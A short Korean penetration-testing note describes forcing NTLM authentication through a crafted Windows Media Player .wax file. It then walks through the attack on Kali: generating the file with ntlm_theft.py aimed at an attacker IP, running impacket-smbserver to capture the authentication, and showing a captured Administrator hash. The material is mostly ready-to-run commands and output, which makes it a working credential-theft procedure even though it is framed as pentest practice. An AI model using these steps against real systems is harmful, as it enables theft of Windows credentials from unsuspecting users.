WAX는 Windows Media Player 형식의 확장 파일 중 하나이며 오디오 파일입니다. wax 파일은 보안 패치가 없는 취약성이 있는데, 파일을 실행시켰을 때 사용자로부터 강제 인증을 시도하여 NTLM을 탈취하는 것입니다. 취약성이 있는 코드를 생성하는 도구는 다운로드 가능합니다.
Practice
깃허브에서 다운로드한 ntlm_theft.py 파일을 가지고 NTLM 탈취에 취약한 확장 파일을 생성합니다.
# NTLM 강제 인증 파일 생성
┌──(root㉿kali)-[~/Pentest/Machine]
└─# python3 ntlm_theft.py -g wax -s 192.168.200.132 -f wiki
Created: wiki/wiki.wax (OPEN)
Generation Complete.
# NTLM Relay 수신을 위한 SMB 서버 실행
┌──(root㉿kali)-[~/Pentest/Machine/wiki]
└─# impacket-smbserver share . -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
# 호스트 컴퓨터에서 파일 실행 후 Kali 터미널 확인
┌──(root㉿kali)-[~/Pentest/Machine/steal]
└─# impacket-smbserver share . -smb2support
...
[*] Administrator::MicrosoftAccount:aaaaaaaaaaaaaaaa:5d00...
